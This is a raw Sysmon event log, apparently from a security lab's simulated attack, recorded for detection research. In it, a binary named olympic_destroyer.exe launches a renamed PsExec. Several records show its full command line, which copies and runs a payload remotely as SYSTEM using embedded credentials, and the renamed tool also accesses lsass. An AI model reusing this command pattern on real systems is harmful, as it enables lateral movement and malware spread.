10341000x8000000000000000217735Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217734Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-12F3-6216-8704-000000003902}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217733Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.401{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12F3-6216-8704-000000003902}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:51.402{4F8D34B0-12F3-6216-8704-000000003902}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000217731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:48.458{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51412-false10.0.1.12-8000- 10341000x8000000000000000291619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.842{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12F3-6216-B105-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.841{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.841{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.841{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.840{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.839{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F3-6216-B105-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.838{C8EA50B7-12F3-6216-B105-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:51.838{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F3-6216-B105-000000003802}6400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000291611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.681{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local137netbios-nsfalse10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal137netbios-ns 534500x8000000000000000291610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:50.997{C8EA50B7-12F2-6216-AF05-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000291609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:50.981{C8EA50B7-12F2-6216-AF05-000000003802}6276C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000291648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.989{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F42FEFAD4BA1D230F9D65D7F0BC51853,SHA256=7F18D88C8DCD92E92588F17D9D9E5038EB122A842033C1E7C8DD5E0A2AE189E9,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000291647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.305{C8EA50B7-12F4-6216-B305-000000003802}6508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.305{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F4-6216-B305-000000003802}6508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.305{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F4-6216-B305-000000003802}6508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:52.289{C8EA50B7-12F4-6216-B305-000000003802}6508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.258{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F4-6216-B405-000000003802}6756C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.258{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F4-6216-B405-000000003802}6756C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.242{C8EA50B7-12F4-6216-B405-000000003802}67566596C:\Windows\system32\conhost.exe{C8EA50B7-12F4-6216-B305-000000003802}6508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.220{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F4-6216-B405-000000003802}6756C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.204{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F4-6216-B405-000000003802}6756C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.088{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.088{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.088{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.088{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.088{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F4-6216-B305-000000003802}6508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.074{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12F4-6216-B305-000000003802}6508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:52.086{C8EA50B7-12F4-6216-B305-000000003802}6508C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 